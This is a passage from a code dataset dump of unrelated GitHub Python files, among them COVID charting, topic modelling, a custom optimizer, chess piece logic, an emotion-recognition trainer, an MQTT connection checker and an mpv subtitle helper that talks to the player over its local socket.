------------------------------------------------------------------------------------------\"\"\"\nprint(\"This program will be providing charts and graph for daily new cases and deaths regarding to COVID-19 in Washington state.\")\n\n# CSV Dataset is read into a list\ncovidData_WA = grph.csvHandling(\"us-states-covid.csv\", True) # return data type is a list of `WA_COVID` objects\n\n#print(f\"{covidData_WA.dates}\\n\\n{covidData_WA.cases}\\n\\n{covidData_WA.deaths}\") # check list data (you may ignore)\n\n\n# Line Chart\ngrph.covid_lineplot(covidData_WA)\n\n\n# Box Plot\ngrph.covid_boxplot(covidData_WA)\n\n\n# 3 data related questions and answes (complexity)\ngrph.ans2ques(covidData_WA)","repo_name":"sonikkk-526/COVID-Data-Visualization","sub_path":"src/data_visualization_main.py","file_name":"data_visualization_main.py","file_ext":"py","file_size_in_byte":1601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"5816575638","text":"from sklearn.feature_extraction.text import CountVectorizer\nimport re\nimport pickle\n\nclass nlp_pipeline:\n\n def __init__(self, vectorizer=CountVectorizer(), tokenizer=None, cleaning_function=None, \n stemmer=None, lemm=None, model=None):\n if not tokenizer:\n tokenizer = self.splitter\n if not cleaning_function:\n cleaning_function = self.clean_text\n self.stemmer = stemmer\n self.lemm = lemm\n self.tokenizer = tokenizer\n self.model = model\n self.cleaning_function = cleaning_function\n self.vectorizer = vectorizer\n self._is_fit = False\n self.words = None\n self.topics = None\n \n def splitter(self, text):\n return text.split(' ')\n \n def clean_text(self, text, tokenizer, stemmer, lemm):\n cleaned_text = []\n for doc in text:\n cleaned_words = []\n for word in tokenizer(doc):\n low_word = re.sub('[\\d\\W]','', word).lower()\n if 
stemmer:\n low_word = stemmer.stem(low_word)\n if lemm:\n low_word = lemm.lemmatize(low_word)\n cleaned_words.append(low_word)\n cleaned_text.append(' '.join(cleaned_words))\n return cleaned_text \n\n def fit_transform(self, text):\n clean_text = self.cleaning_function(text, self.tokenizer, self.stemmer, self.lemm)\n self.words = self.vectorizer.fit_transform(clean_text)\n self.topics = self.model.fit_transform(self.words)\n self._is_fit = True\n return self.topics\n\n def transform_new(self, text):\n clean_text = self.cleaning_function(text, self.tokenizer, self.stemmer, self.lemm)\n self.words_new = self.vectorizer.transform(clean_text)\n self.topics_new = self.model.transform(self.words_new)\n return self.topics_new\n\n def print_topics(self, num_words=10):\n feat_names = self.vectorizer.get_feature_names()\n for topic_idx, topic in enumerate(self.model.components_):\n message = \"Topic #%d: \" % topic_idx\n message += \" \".join([feat_names[i] for i in topic.argsort()[:-num_words - 1:-1]])\n print(message)","repo_name":"angarney/news_anti_recommendation_system","sub_path":"Project_Development/Modeling/topic_modeling_class.py","file_name":"topic_modeling_class.py","file_ext":"py","file_size_in_byte":2230,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"7266620091","text":"import torch\nimport math\nimport cross_validation\nfrom loss import LossMSE, LossMAE, CrossEntropy\nfrom helpers import generator\n\n\nclass Optimizer:\n def __init__(self, models, names, epochs = 100, mini_batch_size = 4, criterion = \"MSE\",\n learning_rate = 0.001, Adam = True, epsilon = 1e-8, beta_1 = 0.9, beta_2 = 0.999):\n \"\"\" Constructor of the Train class, enables to train multiple networks.\n\n :param models: list of the model(s)\n :param epochs: number of epochs\n :param mini_batch_size: mini_batch size\n :param criterion: if \"MSE\", use the MSE loss; if \"MAE\" it will be the MAE loss function.\n :param learning_rate: learning rate for optimization of parameters.\n :param epsilon: small value preventing from zero division.\n :param beta_1: hyperparameter for the calculation ot the mean in the Adam optimizer.\n :param beta_2: hyperparameter for the calculation ot the variance in the Adam optimizer.\n\n :return: the models and their accuracy in a dictionnary.\n \"\"\"\n\n # Models and info :\n self.models = models\n self.names = names\n\n # Parameters for duration:\n self.epochs = epochs\n self.mini_batch_size = mini_batch_size\n if criterion == \"MSE\":\n self.criterion = LossMSE()\n elif criterion == \"MAE\":\n self.criterion = LossMAE()\n elif criterion == \"CE\":\n self.criterion = CrossEntropy()\n # Parameters for the optimization (with Adam):\n self.Adam = Adam\n self.learning_rate = learning_rate\n self.epsilon = epsilon\n self.beta_1 = beta_1\n self.beta_2 = beta_2\n self.step = 0\n\n def train(self, train_input, train_labels, verbose = False):\n \"\"\" Training of the model(s) with either stochastic gradient descent or\n with adam optimizer if param Adam is True.\n \"\"\"\n for model, name in zip(self.models, self.names):\n if verbose:\n print('Training {}...'.format(name))\n for epoch in range(self.epochs):\n loss = 0.0\n\n for batch_index in range(0, train_input.size(0), self.mini_batch_size):\n batch_input = train_input.narrow(0, batch_index, self.mini_batch_size)\n batch_labels = train_labels.narrow(0, batch_index, self.mini_batch_size)\n\n model.zero_grad()\n\n pred = model.forward(batch_input)\n loss += 
self.criterion.forward(pred, batch_labels)\n\n                    gradwrtoutput = self.criterion.backward()\n                    model.backward(gradwrtoutput)\n\n                    if self.Adam:\n                        self.adam_optimizer()\n                    else:\n                        self.stochastic_gradient_descent()\n\n                min_loss = loss.min()\n                epoch_min_loss = loss.argmin()\n\n                if verbose:\n                    print('Epoch = {}, {} Loss = {}, Best Epoch = {}, Best Val = {}'.format(epoch, self.criterion, loss, epoch_min_loss, min_loss))\n\n\n    def stochastic_gradient_descent(self):\n        \"\"\" Update of the weight and bias parameters of the model(s). \"\"\"\n        self.step += 1\n\n        for model in self.models:\n            model.gradient_descent(learning_rate = self.learning_rate)\n\n    def adam_optimizer(self):\n        \"\"\" optimization with Adam. \"\"\"\n\n        self.step += 1\n\n        for model in self.models:\n            for (w_b, grad, mean, var) in model.param():\n                mean = self.beta_1 * mean + (1-self.beta_1) * grad\n                var = self.beta_2 * var + (1-self.beta_2) * grad**2\n\n                mean_hat = mean / (1 - self.beta_1**(self.step + 1))\n                var_hat = var / (1 - self.beta_2**(self.step + 1))\n\n                w_b.sub_(self.learning_rate * mean_hat / (var_hat.sqrt() + self.epsilon))\n\n    def compute_accuracy(self, test_input, test_labels):\n        \"\"\" Compute the model(s) prediction accuracy. \"\"\"\n        accuracy = torch.zeros((len(self.names),1))\n\n        for index, model in enumerate(self.models):\n            predicted_labels = model.forward(test_input)\n            grad = model.zero_grad()\n            accuracy[index] = (predicted_labels.argmax(dim = 1) == test_labels).float().mean()\n\n        return accuracy\n","repo_name":"GBNTN/DeepLearningProject","sub_path":"project02/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"24526795198","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nGame of life simple script for checking init states and checking if the evolution is\r\nimplemented correctly.\r\n\r\nCreated on Tue Jan 15 12:37:52 2019\r\n\r\n@author: shakes\r\n\"\"\"\r\nimport conway\r\n\r\nN = 64\r\n\r\n# create the game of life object\r\nlife = conway.GameOfLife(N)\r\n# life.insertBlinker((0,0))\r\nlife.insertGlider((0,0)) # It travels diagonally across the Life grid at a speed of c/4\r\n# life.insertGliderGun((0,0)) # Gosper glider gun consists of two queen bee shuttles stabilized by two blocks.\r\n# life.insertFromFile(\"snail spaceship.cells\", (0,30))\r\n# life.insertFromFile(\"dragon spaceship.cells\", (0,30))\r\n# life.insertFromFile(\"ak94 gun.cells\", (0,0))\r\n# life.insertFromFile(\"vacuumgun gun.cells\", (0,0))\r\n# life.insertFromFile(\"stargate oscillator.cells\", (0,0))\r\n# life.insertFromFile(\"7enginecordership spaceship.cells\", (0,0))\r\ncells = life.getStates() # initial state\r\n\r\n# evolve once\r\nlife.evolve()\r\ncellsUpdated1 = life.getStates()\r\n\r\n# evolve twice\r\nlife.evolve()\r\ncellsUpdated2 = life.getStates()\r\n\r\n# -------------------------------\r\n# plot cells\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\nplt.figure(num=0)\r\nplt.gray()\r\nplt.imshow(cells) # initial state\r\nax = plt.gca()\r\n# Minor ticks\r\nax.set_xticks(np.arange(-.5, N, 1), minor=True);\r\nax.set_yticks(np.arange(-.5, N, 1), minor=True);\r\n# grid\r\nax.grid(which='minor', color='w', linestyle='-', 
linewidth=1)\r\n\r\nplt.figure(num=2)\r\nplt.imshow(cellsUpdated2) # evolve twice\r\nax = plt.gca()\r\n# Minor ticks\r\nax.set_xticks(np.arange(-.5, N, 1), minor=True);\r\nax.set_yticks(np.arange(-.5, N, 1), minor=True);\r\n# grid\r\nax.grid(which='minor', color='w', linestyle='-', linewidth=1)\r\n\r\nplt.show()\r\n","repo_name":"danielzhangau/Modern-Computation","sub_path":"3gameoflife lab/test_gameoflife_glider_simple.py","file_name":"test_gameoflife_glider_simple.py","file_ext":"py","file_size_in_byte":1970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"35014639947","text":"from public.schemas.github import PushPayload\nfrom sonja.client import Crawler\nfrom sonja.database import Session\nfrom sonja.model import Repo\n\n\ndef process_push(session: Session, crawler: Crawler, payload: PushPayload):\n if not payload.after or not payload.ref:\n return\n\n https_repos = session.query(Repo)\\\n .filter_by(url=f\"https://github.com/{payload.repository.full_name}.git\")\\\n .all()\n\n ssh_repos = session.query(Repo)\\\n .filter_by(url=f\"git@github.com:{payload.repository.full_name}.git\")\\\n .all()\n\n for repo in https_repos + ssh_repos:\n crawler.process_repo(str(repo.id), payload.after, payload.ref.removeprefix(\"refs/\"))\n","repo_name":"uboot/sonja-backend","sub_path":"services/public/crud/github.py","file_name":"github.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"17710389073","text":"import re\nimport numpy as np\nimport string\nimport collections\n\n## Input\nwith open('input.txt') as f:\n input = f.read()\n\nlines = input.strip().split('\\n')\n\npairs = list([])\n\nfor i in range(0,len(lines)):\n\tpairs.append(re.findall(r\"p ([A-Z]*)\",lines[i]))\n\n# class myLetter:\n\n# \tdef __init__(self, letter):\n# \t\tself.letter = letter\n# \t\tself.before = list([])\n# \t\tself.after = list([])\n\n# \tdef prereq(self, next_letter):\n# \t\tself.before.append(next_letter)\n\n# \tdef depends_on(self, last_letter):\n# \t\tself.after.append(last_letter)\n\nalpha_dict = {}\n\nalpha_list = list(string.ascii_uppercase)\n#alpha_list = list(string.ascii_uppercase)[0:6]\n\nfor letter in alpha_list:\n\talpha_dict[letter] = []\n\nfor i in range(0,len(lines)):\n \talpha_dict[pairs[i][1]].append(pairs[i][0])\n\nprint(alpha_dict)\n\nn = len(alpha_list)\nansString = ''\nstill_left = alpha_list\nwhile n > 0:\n\ta = len(still_left)\n\ti = 0\n\twhile i < a:\n\t\tletter = still_left[i]\n\t\t#print(letter)\n\t\ti = i + 1\n\t\tif len(alpha_dict[letter]) == 0:\n\t\t\talpha_dict.pop(letter)\n\t\t\tstill_left.remove(letter)\n\t\t\tansString += letter\n\t\t\tprint(letter)\n\t\t\tprint(ansString)\n\t\t\tn = n - 1\n\t\t\tfor letter2 in still_left:\n\t\t\t\tif letter in alpha_dict[letter2]:\n\t\t\t\t\talpha_dict[letter2].remove(letter)\n\t\t\ta = a - 1\n\t\t\ti = 0\n\t\t#IBJTUWGFKDNVEYHQAOMPCRLSZX\n\nprint(ansString)","repo_name":"srmwright/advent","sub_path":"2018/7/.ipynb_checkpoints/part1-checkpoint.py","file_name":"part1-checkpoint.py","file_ext":"py","file_size_in_byte":1295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"9333930815","text":"from __future__ import annotations\n\nimport logging\n\nfrom .instance import Instance\nfrom .jsonrpc import (\n JsonRpcFuture,\n JsonRpcManager,\n JsonRpcReply,\n JsonRpcRequest,\n serialize_request_to_binary,\n 
serialize_request_to_text,\n)\nfrom .websocket import WebSocket\n\n\nclass Client(Instance):\n def __init__(\n self, websocket: WebSocket, logger: logging.Logger, manager: JsonRpcManager\n ) -> None:\n self._websocket = websocket\n self._logger = logger\n self._manager = manager\n\n @property\n def connected(self) -> bool:\n return not self._websocket.closed\n\n def disconnect(self) -> None:\n self._logger.info(\"Disconnection from Brayns instance.\")\n self._websocket.close()\n self._manager.clear()\n\n def is_running(self, id: int | str) -> bool:\n return self._manager.is_running(id)\n\n def send(self, request: JsonRpcRequest) -> JsonRpcFuture:\n self._logger.info(\"Send request: %s.\", request)\n self._logger.debug(\"Request params: %s.\", request.params)\n self._logger.info(\"Request binary: %d bytes.\", len(request.binary))\n self._send(request)\n return self._create_future(request.id)\n\n def poll(self, block: bool) -> None:\n self._logger.debug(\"Polling messages from Brayns instance.\")\n self._websocket.poll(block)\n\n def cancel(self, id: int | str) -> None:\n self._logger.info(\"Cancel request with ID %s.\", id)\n self.request(\"cancel\", {\"id\": id})\n\n def _send(self, request: JsonRpcRequest) -> None:\n if request.binary:\n data = serialize_request_to_binary(request)\n self._logger.debug('Request binary frame data: \"%s\".', data)\n self._websocket.send_binary(data)\n return\n data = serialize_request_to_text(request)\n self._logger.debug('Request text frame data: \"%s\".', data)\n self._websocket.send_text(data)\n\n def _create_future(self, id: int | str | None) -> JsonRpcFuture:\n if id is None:\n reply = JsonRpcReply.for_notifications()\n return JsonRpcFuture.from_reply(reply)\n return JsonRpcFuture(\n task=self._manager.create_task(id),\n cancel=lambda: self.cancel(id),\n poll=lambda block: self.poll(block),\n )\n","repo_name":"BlueBrain/Brayns","sub_path":"python/brayns/network/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":2312,"program_lang":"python","lang":"en","doc_type":"code","stars":284,"dataset":"github-code","pt":"77"} +{"seq_id":"72764658810","text":"import paho.mqtt.client as mqtt\nimport sys\n# set server and port to the first two arguments\nif len(sys.argv) < 3:\n print(\"Usage: python3 mqtt_connect.py \")\n sys.exit(1)\nserver = sys.argv[1]\nport = int(sys.argv[2])\n\nclient = mqtt.Client()\n# connect to the server\ntry:\n code = client.connect(server, port, 60)\n if code == 0:\n print(f\"Connection to {server} on port {port} sucessful\")\n else:\n print(f\"result code was {code}\")\nexcept Exception as e:\n print(f\"excepetion occured {e}\")\n\n\n","repo_name":"tavdog/tidbyt-manager","sub_path":"mqtt_server_checker.py","file_name":"mqtt_server_checker.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"31421042043","text":"from copy import copy\n\nclass Piece(object):\n def __init__(self, color, spot, board): # Have every piece hold its spot, then when moving you can check existing game piece's spot and use that for moving/attacking\n self.color = color\n self.spot = spot #pass in the spot when filling board\n self.board = board\n self.first_move = True\n\n if self.color == 'white':\n self.char = self.white \n self.reverse_char = self.black\n else: \n self.char = self.black \n self.reverse_char = self.white \n\n def __repr__(self):\n return self.char\n \n def king_in_check(self, spot): \n return self.test_move(spot, 
self.king_in_check_helper)\n\n    def king_in_check_helper(self, spot): \n        king = self.get_king()\n        if not king:\n            return False\n        return king.in_check(king.spot)\n\n    def get_king(self):\n        king_list = filter(lambda x: isinstance(x, King) and x.color == self.color, self.board.flatten()) \n        if len(king_list) == 0:\n            return False\n        return king_list[0]\n\n    def get_spot(self, diff): #converts the spot difference into the next possible spot(s)\n        row_diff = -diff[0] if self.color == 'black' else diff[0] # avoid mutating the shared diff list in place\n        \n        new_row, new_col = row_diff + self.spot[0], diff[1] + self.spot[1]\n        return [new_row, new_col]\n    \n    def move(self, next_spot):\n        if self.valid_move(next_spot):\n            piece = self.board.grid[next_spot[0]][next_spot[1]] \n            if isinstance(piece, Piece):\n                piece.spot = None\n            self.board.grid[self.spot[0]][self.spot[1]] = ' '\n            self.spot = next_spot\n            self.board.grid[self.spot[0]][self.spot[1]] = self\n            self.first_move = False\n\n    def valid_move(self, next_spot): # return true or false \n        if next_spot in self.possible_moves():\n            return True\n        else:\n            return False\n\n    def check_spot(self, spot, check_king=True):#checks the spot to see if it is empty and if it is in bounds of the board \n        if self.board.in_bounds(spot):\n            if check_king and self.king_in_check(spot):\n                return False \n            if self.board.spot_empty(spot):\n                return True\n            other_piece = self.board.grid[spot[0]][spot[1]]\n            if isinstance(other_piece, Piece) and other_piece.color != self.color:\n                return True \n        return False \n    \n    def test_move(self, spot, function): #spot: the spot you want to move, function: in_check_helper\n        if not self.board.in_bounds(spot):\n            return False\n        original_spot = copy(self.spot) # copies the original spot\n        test_spot = self.board.grid[spot[0]][spot[1]] # gives the actual board location of the spot you want to move\n\n        self.board.grid[self.spot[0]][self.spot[1]] = ' ' # sets the current spot of the piece to empty\n        self.spot = spot # sets the pieces spot to the new spot \n        self.board.grid[spot[0]][spot[1]] = self # assigns the piece to the new spot\n        \n        result = function(spot) #calls the in_check_helper on the spot to see if the \n        #new state of the board puts the king in check\n        self.board.grid[self.spot[0]][self.spot[1]] = test_spot #next 3 lines revert board to original state.\n        self.spot = original_spot\n        self.board.grid[self.spot[0]][self.spot[1]] = self \n\n        return result \n    \n    def possible_moves(self, check_king=True):\n        return self.get_sliding_moves(check_king=check_king)\n\n    def get_sliding_moves(self, check_king=True):\n        poss = []\n        for diff in self.dir_diffs:\n            spot = self.get_spot(diff)\n            new_diff = copy(diff)\n            while self.check_spot(spot, check_king):\n                poss.append(spot)\n                if self.board.in_bounds(spot) and not self.board.spot_empty(spot):\n                    break \n                new_diff[0] += diff[0]\n                new_diff[1] += diff[1]\n                spot = self.get_spot(new_diff)\n        \n        return poss\n    \n\nclass Pawn(Piece):\n    white = u'\\u2659'\n    black = u'\\u265F'\n    \n    def possible_moves(self, check_king=True): #returns a list of the possible moves\n        if self.first_move:\n            poss_empty = map(self.get_spot, [[-1, 0], [-2, 0]])\n            if not self.board.spot_empty(poss_empty[0]): \n                poss_empty = map(self.get_spot, [[-1, 0]])\n        else:\n            poss_empty = map(self.get_spot, [[-1, 0]])\n        \n        poss_taken = map(self.get_spot, [[-1, -1], [-1, 1]]) \n        poss = []\n        \n        for spot in poss_empty:\n            if self.board.in_bounds(spot) and self.board.spot_empty(spot): \n                if check_king and self.king_in_check(spot):\n                    continue\n                poss.append(spot)\n        \n        for spot in poss_taken:\n            if self.board.in_bounds(spot) and not 
self.board.spot_empty(spot): \n                if check_king and self.king_in_check(spot):\n                    continue\n                poss.append(spot)\n        \n        return poss\n    \nclass Knight(Piece): \n    white = u'\\u2658' \n    black = u'\\u265E'\n    diffs = [[2, 1], [2, -1], [-2, 1], [-2, -1],\n             [-1, 2], [-1, -2], [1, -2], [1, 2]]\n    \n    def possible_moves(self, check_king=True):\n        poss = []\n        for diff in self.diffs:\n            spot = self.get_spot(diff)\n            if self.check_spot(spot, check_king=check_king):\n                poss.append(spot)\n        \n        return poss\n\nclass Bishop(Piece):\n    white = u'\\u2657'\n    black = u'\\u265D'\n    dir_diffs = [[1, 1], [1, -1], [-1, 1] , [-1, -1]]\n\nclass Rook(Piece):\n    white = u'\\u2656'\n    black = u'\\u265C'\n    dir_diffs = [[1, 0], [-1, 0], [0, -1], [0, 1]]\n    \nclass Queen(Piece):\n    white = u'\\u2655'\n    black = u'\\u265B'\n    dir_diffs = [[1, 1], [1, -1], [-1, 1] , [-1, -1], [1, 0], [-1, 0], [0, -1], [0, 1]]\n    \nclass King(Piece):\n    white = u'\\u2654'\n    black = u'\\u265A'\n    diffs = [[1, 1], [1, -1], [-1, 1] , [-1, -1], [1, 0], [-1, 0], [0, -1], [0, 1]]\n    \n    def possible_moves(self):\n        poss = [] \n        for diff in self.diffs:\n            spot = self.get_spot(diff)\n            if not self.in_check(spot) and self.check_spot(spot):\n                poss.append(spot)\n        \n        return poss\n\n    def in_check(self, spot): #spot: spot we want to move\n        return self.test_move(spot, self.in_check_helper)\n    \n\n    def in_check_helper(self, spot): #Flattens board, filters kings and opposite color pieces from pieces, \n        flat_board = self.board.flatten() \n        pieces = filter(lambda x: isinstance(x, Piece) and x.color != self.color and not isinstance(x, King), flat_board)\n        for piece in pieces:\n            if spot in piece.possible_moves(check_king=False):\n                return True # returns true if the spot you want to move is in any other pieces possible move list.\n        \n        return False \n","repo_name":"tylerprobst/Chess","sub_path":"Chess_pieces.py","file_name":"Chess_pieces.py","file_ext":"py","file_size_in_byte":7216,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"30172193356","text":"def search(a,ele):\n\tstart= 0\n\tend=len(a)-1\n\twhile start<= end:\n\t\tmid = ( start + end )//2\n\t\tif (ele == a[mid]):\n\t\t\treturn 1\n\t\telif (ele > a[mid]):\n\t\t\tstart = mid+1\n\t\t\n\t\telse:\n\t\t\tend = mid - 1\n\treturn -1\nf = open('search.txt')\ntestcases = int(f.readline())\nfor i in range(0,testcases):\n\tlis2 = list(f.readline())\n\tb = int(lis2[2])\n\tlis3 = list(f.readline())\n\tlis4 = []\n\tfor i in lis3:\n\t\tif(i != ' ' and i != '\\n'):\n\t\t\tlis4.append(int(i))\n\ta = search(lis4 , b)\n\tprint(a)\n\n\t\n","repo_name":"Kratharth/ADA-1BM17CS035","sub_path":"search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"20204024377","text":"from __future__ import absolute_import, division, print_function, unicode_literals\n\nimport tensorflow as tf\n\nimport pickle\nimport numpy as np\nimport random as rn\n\nfrom tensorflow.keras import backend as K\nfrom tensorflow.keras.layers import Attention\nfrom tensorflow.keras.layers import AdditiveAttention\nfrom tensorflow.keras.callbacks import ModelCheckpoint\nfrom tensorflow.keras.callbacks import EarlyStopping\nfrom tensorflow.keras.models import load_model\n\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import classification_report\nfrom sklearn.utils import class_weight\nfrom sklearn.model_selection import train_test_split\n\nfrom 
model import build_model\nfrom data import load_data\nfrom config import LABEL_NAMES\n\nfrom gmu import GmuLayer\nfrom tfl import TflLayer\nfrom ggf import GgfLayer\n\n## Begin of settings for reproducible results\nimport os\nos.environ['PYTHONHASHSEED'] = '33'\nos.environ['TF_DETERMINISTIC_OPS'] = '1'\nnp.random.seed(33)\nrn.seed(33)\ntf.set_random_seed(33)\n#tf.random.set_seed(33)\n\nsess_conf = tf.ConfigProto(intra_op_parallelism_threads=1,\n                           inter_op_parallelism_threads=1)\nsess_conf.gpu_options.allow_growth = True\nsess_conf.log_device_placement = False\nsess = tf.Session(graph=tf.get_default_graph(), config=sess_conf)\nK.set_session(sess)\n## End of settings\n\nflags = tf.app.flags\nflags.DEFINE_string(name='mode', default='train', help='set running mode: train, test')\nflags.DEFINE_string(name='fusion', default='gmu', help='fusion model: concat, gmu, tfl')\nflags.DEFINE_string(name='source', default='audio_text', help='data source: audio, text, audio_text')\nflags.DEFINE_string(name='tokenizer_filename', default='tokenizer.pkl', help='file name of tokenizer')\nflags.DEFINE_string(name='train_filename', default='./time-mfcc/train.npz', help='train filename of the features data')\nflags.DEFINE_string(name='valid_filename', default=None, help='valid filename of the features data')\nflags.DEFINE_string(name='test_filename', default='./time-mfcc/test.npz', help='test filename of the features data')\nflags.DEFINE_integer(name='batch_size', default=32, help='number of examples in a batch')\nflags.DEFINE_integer(name='epochs', default=100, help='number of epochs')\nflags.DEFINE_integer(name='patience', default=5, help='patience before stopping training')\n\n\ndef train():\n    source = flags.FLAGS.source\n    fusion = flags.FLAGS.fusion\n    train_filename = flags.FLAGS.train_filename\n    valid_filename = flags.FLAGS.valid_filename\n    batch_size = flags.FLAGS.batch_size\n    epochs = flags.FLAGS.epochs\n    patience = flags.FLAGS.patience\n\n    x_train_audio, x_train_text, y_train = load_data(train_filename)\n    #x_train_audio, x_train_text, y_train = shuffle(x_train_audio, x_train_text, y_train, random_state=28)\n\n    if valid_filename is None:\n        x_train_audio, x_valid_audio, x_train_text, x_valid_text, y_train, y_valid = train_test_split(\n            x_train_audio, x_train_text, y_train, random_state=15, stratify=y_train, test_size=0.05)\n    else:\n        x_valid_audio, x_valid_text, y_valid = load_data(valid_filename)\n    print('train:', x_train_audio.shape, x_train_text.shape, y_train.shape)\n    print('valid:', x_valid_audio.shape, x_valid_text.shape, y_valid.shape)\n\n    # compute class weights\n    classes = np.unique(y_train)\n    print(classes)\n    weights = class_weight.compute_class_weight('balanced', classes, y_train)\n    # Keras expects class_weight as a {label: weight} dict, not a bare array\n    weights = dict(zip(classes, weights))\n    print(weights)\n\n    # load tokenizer\n    with open(flags.FLAGS.tokenizer_filename, 'rb') as tokenizer_file:\n        tokenizer = pickle.load(tokenizer_file)\n\n    model = build_model(len(classes), tokenizer['tokenizer'].word_index, tokenizer['num_words'], tokenizer['maxlen'],\n                        audio_input_shape=(x_train_audio.shape[1], x_train_audio.shape[2]), source=source, fusion=fusion)\n\n    early_stopping = EarlyStopping(monitor='val_acc', patience=patience)\n    checkpoint_callback = ModelCheckpoint('models/{}-{}-best.h5'.format(source, fusion),\n                                          verbose=1, save_best_only=True, monitor='val_acc', mode='max')\n\n    if source == 'audio':\n        model.fit(x_train_audio, y_train, batch_size=batch_size, epochs=epochs, class_weight=weights,\n                  validation_data=(x_valid_audio, y_valid), verbose=1,\n                  callbacks=[early_stopping, checkpoint_callback])\n    elif 
source == 'text':\n model.fit(x_train_text, y_train, batch_size=batch_size, epochs=epochs, class_weight=weights,\n validation_data=(x_valid_text, y_valid), verbose=1,\n callbacks=[early_stopping, checkpoint_callback])\n else:\n model.fit([x_train_audio, x_train_text], y_train, batch_size=batch_size, epochs=epochs, class_weight=weights,\n validation_data=([x_valid_audio, x_valid_text], y_valid), verbose=1,\n callbacks=[early_stopping, checkpoint_callback])\n\n\ndef get_custom_objects():\n custom_objects = {'GmuLayer': GmuLayer, 'TflLayer': TflLayer, 'Attention': Attention,\n 'GgfLayer': GgfLayer, 'AdditiveAttention': AdditiveAttention}\n return custom_objects\n\n\ndef test():\n x_test_audio, x_test_text, y_test= load_data(flags.FLAGS.test_filename)\n print(x_test_audio.shape, x_test_text.shape, y_test.shape)\n\n source = flags.FLAGS.source\n fusion = flags.FLAGS.fusion\n model = load_model('models/{}-{}-best.h5'.format(source, fusion), custom_objects=get_custom_objects())\n\n if source == 'audio':\n scores = model.evaluate(x_test_audio, y_test)\n print('scores: ', scores)\n predictions = model.predict(x_test_audio).argmax(axis=-1)\n elif source == 'text':\n scores = model.evaluate(x_test_text, y_test)\n print('scores: ', scores)\n predictions = model.predict(x_test_text).argmax(axis=-1)\n else:\n scores = model.evaluate([x_test_audio, x_test_text], y_test)\n print('scores: ', scores)\n predictions = model.predict([x_test_audio, x_test_text]).argmax(axis=-1)\n\n print('accuracy: {:.4f}'.format(accuracy_score(y_test, predictions)))\n print(classification_report(y_test, predictions, digits=4, target_names=LABEL_NAMES))\n print(confusion_matrix(y_test, predictions))\n\n\nif __name__ == '__main__':\n mode = flags.FLAGS.mode\n if mode == 'train':\n train()\n elif mode == 'test':\n test()\n else:\n print('Unsupported mode: {}'.format(mode))\n","repo_name":"ppfliu/emotion-recognition","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6462,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"77"} +{"seq_id":"26463767476","text":"#! 
/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\nimport sys\nimport subprocess\n\nimport time\n\nfrom json import loads\n\nfrom PyQt5 import QtWebEngineWidgets\nfrom PyQt5.QtCore import Qt, QThread, QObject, QSize, QPointF\nfrom PyQt5.QtCore import pyqtSignal, pyqtSlot\nfrom PyQt5.QtCore import QUrl, QPoint, QRect\nfrom PyQt5.QtWidgets import QTextEdit, QFrame, QApplication\n\nfrom PyQt5.QtGui import QTextCursor, QFont, QPainter, QPen, QColor\nfrom PyQt5.QtWidgets import QVBoxLayout, QHBoxLayout\n\nimport math\n\nimport socket\n\nimport warnings\n\npth = os.path.expanduser('~/.config/mpv/scripts/')\nos.chdir(pth)\nimport rikai_config as config\n\n# the import below is extremely useful to debug events by printing their type\n# with `print(event_lookup[str(event.type())])`\n# from event_lookup import event_lookup\n\n\ndef sign(x):\n    if x >= 0:\n        return 1\n    else:\n        return -1\n\n\ndef mpv_pause():\n    os.system('echo \\'{ \"command\": [\"set_property\", \"pause\", true] }\\' | socat - \"' + mpv_socket + '\" > /dev/null')\n\n\ndef mpv_resume():\n    os.system('echo \\'{ \"command\": [\"set_property\", \"pause\", false] }\\' | socat - \"'\n              + mpv_socket + '\" > /dev/null')\n\n\ndef mpv_pause_status():\n    # loop instead of recursing so a persistently failing socket cannot\n    # overflow the call stack\n    while True:\n        stdoutdata = subprocess.getoutput(\n            'echo \\'{ \"command\": [\"get_property\", \"pause\"] }\\' | socat - \"' + mpv_socket + '\"')\n        \n        try:\n            return loads(stdoutdata)['data']\n        except Exception:\n            time.sleep(0.05)\n\n\ndef mpv_fullscreen_status():\n    # same retry-in-a-loop pattern as mpv_pause_status()\n    while True:\n        stdoutdata = subprocess.getoutput('echo \\'{ \"command\": [\"get_property\", \"fullscreen\"] }\\' | socat - \"'\n                                          + mpv_socket + '\"')\n        try:\n            return loads(stdoutdata)['data']\n        except Exception:\n            time.sleep(0.05)\n\n\nclass thread_subtitles(QObject):\n    update_subtitles = pyqtSignal(bool, str)\n    \n    @pyqtSlot()\n    def main(self):\n        subs = \"\"\n        hidden = True\n        check_time_fullscreen = 0.1\n        \n        inc = 0\n        assert check_time_fullscreen > config.update_time\n        ratio = int(check_time_fullscreen / config.update_time)\n        \n        tmp_file_subs = ''\n        \n        while True:\n            time.sleep(config.update_time)\n            \n            # hide subs when mpv isn't in focus or in fullscreen\n            if inc > ratio:\n                inc = 0\n                if mpv_fullscreen_status():\n                    hidden = False\n                else:\n                    if hidden is not True: # no need to emit if already hidden\n                        hidden = True\n                        